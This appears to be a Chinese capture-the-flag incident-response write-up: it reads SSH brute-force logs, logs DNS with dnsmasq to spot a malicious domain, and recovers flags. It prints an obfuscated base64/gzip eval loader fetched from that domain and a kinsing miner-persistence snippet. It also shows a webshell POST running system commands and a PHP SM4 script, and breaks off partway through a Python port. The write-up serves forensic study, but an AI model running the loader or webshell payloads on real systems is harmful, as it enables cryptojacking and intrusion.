1Aug 10 09:57:10 lee-virtual-machine sshd[83179]: Failed password for lee from 192.168.145.131 port 36554 ssh2

1Aug 10 10:00:14 lee-virtual-machine sshd[83820]: Accepted password for lee from 192.168.145.131 port 37864 ssh2

1flag{192.168.145.131}

1┌──(kali㉿kali)-[~/Desktop]2└─$ grep "Failed password for lee from 192.168.145.131" auth.log | wc -l3257

1Aug 10 10:00:44 lee-virtual-machine sshd[83929]: Invalid user kali from 192.168.145.131 port 47584

1flag{258}

1flag{/usr/sbin/sshd}

1sudo apt-get install dnsmasq2ps aux | grep unattended3sudo systemctl stop unattended-upgrades4sudo apt-get install dnsmasq5sudo rm /var/lib/dpkg/lock-frontend 6sudo rm /var/lib/dpkg/lock7sudo apt-get install dnsmasq8sudo systemctl stop systemd-resolved9sudo systemctl disable systemd-resolved10sudo tee /etc/dnsmasq.conf > /dev/null << 'EOF'11# 监听所有接口1213listen-address=127.0.0.114# 上游 DNS 服务器1516server=8.8.8.817server=8.8.4.418# 启用查询日志1920log-queries21# 日志到 syslog2223log-facility=/var/log/dnsmasq.log24# 缓存大小2526cache-size=100027# 不读取 /etc/hosts（可选）2829no-hosts30EOF3132sudo cp /etc/resolv.conf /etc/resolv.conf.bak33sudo rm /etc/resolv.conf34sudo tee /etc/resolv.conf > /dev/null << 'EOF'35nameserver 127.0.0.136EOF3738sudo systemctl enable dnsmasq39sudo systemctl start dnsmasq40nslookup google.com41sudo tail -f /var/log/dnsmasq.log42wget baidu.com43sudo tail -f /var/log/dnsmasq.log44ipconfig45sudo apt install net-tools46ipconfig47ifconfig

1sudo tee /etc/dnsmasq.conf > /dev/null << 'EOF'2...3log-queries4log-facility=/var/log/dnsmasq.log5...6EOF

1sudo rm /etc/resolv.conf2sudo tee /etc/resolv.conf > /dev/null << 'EOF'3nameserver 127.0.0.14EOF

1sudo systemctl start dnsmasq2sudo tail -f /var/log/dnsmasq.log

1Aug 10 10:30:25 dnsmasq[82360]: query[A] tombaky.com from 127.0.0.12Aug 10 10:30:25 dnsmasq[82360]: forwarded tombaky.com to 8.8.8.83Aug 10 10:30:25 dnsmasq[82360]: forwarded tombaky.com to 8.8.4.44Aug 10 10:30:25 dnsmasq[82360]: reply tombaky.com is 149.202.54.93

1--2025-08-10 10:30:25--  http://tombaky.com:4019/SXyq2Resolving tombaky.com (tombaky.com)... 149.202.54.933Connecting to tombaky.com (tombaky.com)|149.202.54.93|:4019... connected.4HTTP request sent, awaiting response... 200 OK5Length: 8790 (8.6K) [text/plain]6Saving to: ...SXyq...78     0K ........                                              100%  273M=0s9102025-08-10 10:30:26 (273 MB/s) - ...SXyq... saved [8790/8790]11

1flag{tombaky.com}

1#!/bin/bash2${@%a} 'e'va''l "$(  ${*/K/\(1} p"r"${*^}intf  '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'  "${@//A}"|${@%u@}  ba"s"$'\145'""6\4 -d  ${*/?/Ec}  |  ""gunzip -c )""$@"  

1# ... (其他代码)23# 检查挖矿进程是否存在4ps -fe|grep -w "kdevtmpfsi" |grep -v grep5if [ $? -ne 0 ];then6    # 如果不存在，就下载并运行挖矿程序7    download_run_miner8else9    # ...10fi1112# 检查守护进程是否存在13ps -fe|grep -w "kinsing" |grep -v grep14if [ $? -ne 0 ];then15    # 如果不存在，就下载并运行守护进程16    download_run_daemon17else18    # ...19fi2021# ... (其他代码)

1flag{kinsing}

1flag{192.168.145.131}2flag{258}3flag{/usr/sbin/sshd}4flag{tombaky.com}5flag{kinsing}

1flag{pTkbtCNm7yhRN5edKCESbfeXRU795kCQ}

1POST /shell.php HTTP/1.12Host: 192.168.144.128:80003Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.74Accept-Encoding: gzip, deflate5Accept-Language: zh-CN,zh;q=0.96Upgrade-Insecure-Requests: 17User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/139.0.0.0 Safari/537.368Content-Type: application/x-www-form-urlencoded9Content-Length: 301011shell=system("type flag.txt");12HTTP/1.1 200 OK13Date: Mon, 11 Aug 2025 08:40:43 GMT14Server: Apache/2.4.39 (Win64) OpenSSL/1.1.1b mod_fcgid/2.3.9a mod_log_rotate/1.0215X-Powered-By: PHP/7.3.416Transfer-Encoding: chunked17Content-Type: text/html; charset=UTF-81819<?php20class SM4 {21    const ENCRYPT = 1;22    private $sk; 23    private static $FK = [0xA3B1BAC6, 0x56AA3350, 0x677D9197, 0xB27022DC];24    private static $CK = [25        0x00070E15, 0x1C232A31, 0x383F464D, 0x545B6269,26        0x70777E85, 0x8C939AA1, 0xA8AFB6BD, 0xC4CBD2D9,27        0xE0E7EEF5, 0xFC030A11, 0x181F262D, 0x343B4249,28        0x50575E65, 0x6C737A81, 0x888F969D, 0xA4ABB2B9,29        0xC0C7CED5, 0xDCE3EAF1, 0xF8FF060D, 0x141B2229,30        0x30373E45, 0x4C535A61, 0x686F767D, 0x848B9299,31        0xA0A7AEB5, 0xBCC3CAD1, 0xD8DFE6ED, 0xF4FB0209,32        0x10171E25, 0x2C333A41, 0x484F565D, 0x646B727933    ];34    private static $SboxTable = [35        0xD6, 0x90, 0xE9, 0xFE, 0xCC, 0xE1, 0x3D, 0xB7, 0x16, 0xB6, 0x14, 0xC2, 0x28, 0xFB, 0x2C, 0x05,36        0x2B, 0x67, 0x9A, 0x76, 0x2A, 0xBE, 0x04, 0xC3, 0xAA, 0x44, 0x13, 0x26, 0x49, 0x86, 0x06, 0x99,37        0x9C, 0x42, 0x50, 0xF4, 0x91, 0xEF, 0x98, 0x7A, 0x33, 0x54, 0x0B, 0x43, 0xED, 0xCF, 0xAC, 0x62,38        0xE4, 0xB3, 0x1C, 0xA9, 0xC9, 0x08, 0xE8, 0x95, 0x80, 0xDF, 0x94, 0xFA, 0x75, 0x8F, 0x3F, 0xA6,39        0x47, 0x07, 0xA7, 0xFC, 0xF3, 0x73, 0x17, 0xBA, 0x83, 0x59, 0x3C, 0x19, 0xE6, 0x85, 0x4F, 0xA8,40        0x68, 0x6B, 0x81, 0xB2, 0x71, 0x64, 0xDA, 0x8B, 0xF8, 0xEB, 0x0F, 0x4B, 0x70, 0x56, 0x9D, 0x35,41        0x1E, 0x24, 0x0E, 0x5E, 0x63, 0x58, 0xD1, 0xA2, 0x25, 0x22, 0x7C, 0x3B, 0x01, 0x0D, 0x2D, 0xEC,42        0x84, 0x9B, 0x1E, 0x87, 0xE0, 0x3E, 0xB5, 0x66, 0x48, 0x02, 0x6C, 0xBB, 0xBB, 0x32, 0x83, 0x27,43        0x9E, 0x01, 0x8D, 0x53, 0x9B, 0x64, 0x7B, 0x6B, 0x6A, 0x6C, 0xEC, 0xBB, 0xC4, 0x94, 0x3B, 0x0C,44        0x76, 0xD2, 0x09, 0xAA, 0x16, 0x15, 0x3D, 0x2D, 0x0A, 0xFD, 0xE4, 0xB7, 0x37, 0x63, 0x28, 0xDD,45        0x7C, 0xEA, 0x97, 0x8C, 0x6D, 0xC7, 0xF2, 0x3E, 0x1A, 0x71, 0x1D, 0x29, 0xC5, 0x89, 0x6F, 0xB7,46        0x62, 0x0E, 0xAA, 0x18, 0xBE, 0x1B, 0xFC, 0x56, 0x36, 0x24, 0x07, 0x82, 0xFA, 0x54, 0x5B, 0x40,47        0x8F, 0xED, 0x1F, 0xDA, 0x93, 0x80, 0xF9, 0x61, 0x1C, 0x70, 0xC3, 0x85, 0x95, 0xA9, 0x79, 0x08,48        0x46, 0x29, 0x02, 0x3B, 0x4D, 0x83, 0x3A, 0x0A, 0x49, 0x06, 0x24, 0x1A, 0x47, 0x5C, 0x0D, 0xEA,49        0x9E, 0xCB, 0x55, 0x20, 0x15, 0x8A, 0x9A, 0xCB, 0x43, 0x0C, 0xF0, 0x0B, 0x40, 0x58, 0x00, 0x8F,50        0xEB, 0xBE, 0x3D, 0xC2, 0x9F, 0x51, 0xFA, 0x13, 0x3B, 0x0D, 0x90, 0x5B, 0x6E, 0x45, 0x59, 0x3351    ];5253    public function __construct($key) {54        $this->setKey($key);55    }56    public function setKey($key) {57        if (strlen($key) != 16) {58            throw new Exception("SM4");59        }60        $key = $this->strToIntArray($key);61        $k = array_merge($key, [0, 0, 0, 0]);62        for ($i = 0; $i < 4; $i++) {63            $k[$i] ^= self::$FK[$i];64        }65        for ($i = 0; $i < 32; $i++) {66            $k[$i + 4] = $k[$i] ^ $this->CKF($k[$i + 1], $k[$i + 2], $k[$i + 3], self::$CK[$i]);67            $this->sk[$i] = $k[$i + 4];68        }69    }70    public function encrypt($plaintext) {71        $len = strlen($plaintext);72        $padding = 16 - ($len % 16);73        $plaintext .= str_repeat(chr($padding), $padding); 74        $ciphertext = '';75        for ($i = 0; $i < strlen($plaintext); $i += 16) {76            $block = substr($plaintext, $i, 16);77            $ciphertext .= $this->cryptBlock($block, self::ENCRYPT);78        }79        return $ciphertext;80    }81    private function cryptBlock($block, $mode) {82        $x = $this->strToIntArray($block);8384        for ($i = 0; $i < 32; $i++) {85            $roundKey = $this->sk[$i];86            $x[4] = $x[0] ^ $this->F($x[1], $x[2], $x[3], $roundKey);87            array_shift($x);88        }89        $x = array_reverse($x);90        return $this->intArrayToStr($x);91    }92    private function F($x1, $x2, $x3, $rk) {93        return $this->T($x1 ^ $x2 ^ $x3 ^ $rk);94    }95    private function CKF($a, $b, $c, $ck) {96        return $a ^ $this->T($b ^ $c ^ $ck);97    }98    private function T($x) {99        return $this->L($this->S($x));100    }101    private function S($x) {102        $result = 0;103        for ($i = 0; $i < 4; $i++) {104            $byte = ($x >> (24 - $i * 8)) & 0xFF;105            $result |= self::$SboxTable[$byte] << (24 - $i * 8);106        }107        return $result;108    }109    private function L($x) {110        return $x ^ $this->rotl($x, 2) ^ $this->rotl($x, 10) ^ $this->rotl($x, 18) ^ $this->rotl($x, 24);111    }112    private function rotl($x, $n) {113        return (($x << $n) & 0xFFFFFFFF) | (($x >> (32 - $n)) & 0xFFFFFFFF);114    }115    private function strToIntArray($str) {116        $result = [];117        for ($i = 0; $i < 4; $i++) {118            $offset = $i * 4;119            $result[$i] =120                (ord($str[$offset]) << 24) |121                (ord($str[$offset + 1]) << 16) |122                (ord($str[$offset + 2]) << 8) |123                ord($str[$offset + 3]);124        }125        return $result;126    }127    private function intArrayToStr($array) {128        $str = '';129        foreach ($array as $int) {130            $str .= chr(($int >> 24) & 0xFF);131            $str .= chr(($int >> 16) & 0xFF);132            $str .= chr(($int >> 8) & 0xFF);133            $str .= chr($int & 0xFF);134        }135        return $str;136    }137}138try {139    $key = "a8a58b78f41eeb6a";140    $sm4 = new SM4($key);141    $plaintext = "flag";142    $ciphertext = $sm4->encrypt($plaintext);143    echo  base64_encode($ciphertext) ; //VCWBIdzfjm45EmYFWcqXX0VpQeZPeI6Qqyjsv31yuPTDC80lhFlaJY2R3TintdQu144} catch (Exception $e) {145    echo $e->getMessage() ;146}147?>

1import base642import struct3 4class SM4:5    # 静态常量，与PHP代码完全一致6    FK = [0xA3B1BAC6, 0x56AA3350, 0x677D9197, 0xB27022DC]7    CK = [8        0x00070E15, 0x1C232A31, 0x383F464D, 0x545B6269,9        0x70777E85, 0x8C939AA1, 0xA8AFB6BD, 0xC4CBD2D9,10        0xE0E7EEF5, 0xFC030A11, 0x181F262D, 0x343B4249,11        0x50575E65, 0x6C737A81, 0x888F969D, 0xA4ABB2B9,12        0xC0C7CED5, 0xDCE3EAF1, 0xF8FF060D, 0x141B2229,13        0x30373E45, 0x4C535A61, 0x686F767D, 0x848B9299,14        0xA0A7AEB5, 0xBCC3CAD1, 0xD8DFE6ED, 0xF4FB0209,15        0x10171E25, 0x2C333A41, 0x484F565D, 0x646B727916    ]17    SboxTable = [18        0xD6, 0x90, 0xE9, 0xFE, 0xCC, 0xE1, 0x3D, 0xB7, 0x16, 0xB6, 0x14, 0xC2, 0x28, 0xFB, 0x2C, 0x05,19        0x2B, 0x67, 0x9A, 0x76, 0x2A, 0xBE, 0x04, 0xC3, 0xAA, 0x44, 0x13, 0x26, 0x49, 0x86, 0x06, 0x99,20        0x9C, 0x42, 0x50, 0xF4, 0x91, 0xEF, 0x98, 0x7A, 0x33, 0x54, 0x0B, 0x43, 0xED, 0xCF, 0xAC, 0x62,21        0xE4, 0xB3, 0x1C, 0xA9, 0xC9, 0x08, 0xE8, 0x95, 0x80, 0xDF, 0x94, 0xFA, 0x75, 0x8F, 0x3F, 0xA6,22        0x47, 0x07, 0xA7, 0xFC, 0xF3, 0x73, 0x17, 0xBA, 0x83, 0x59, 0x3C, 0x19, 0xE6, 0x85, 0x4F, 0xA8,23        0x68, 0x6B, 0x81, 0xB2, 0x71, 0x64, 0xDA, 0x8B, 0xF8, 0xEB, 0x0F, 0x4B, 0x70, 0x56, 0x9D, 0x35,24        0x1E, 0x24, 0x0E, 0x5E, 0x63, 0x58, 0xD1, 0xA2, 0x25, 0x22, 0x7C, 0x3B, 0x01, 0x0D, 0x2D, 0xEC,25        0x84, 0x9B, 0x1E, 0x87, 0xE0, 0x3E, 0xB5, 0x66, 0x48, 0x02, 0x6C, 0xBB, 0xBB, 0x32, 0x83, 0x27,26        0x9E, 0x01, 0x8D, 0x53, 0x9B, 0x64, 0x7B, 0x6B, 0x6A, 0x6C, 0xEC, 0xBB, 0xC4, 0x94, 0x3B, 0x0C,27        0x76, 0xD2, 0x09, 0xAA, 0x16, 0x15, 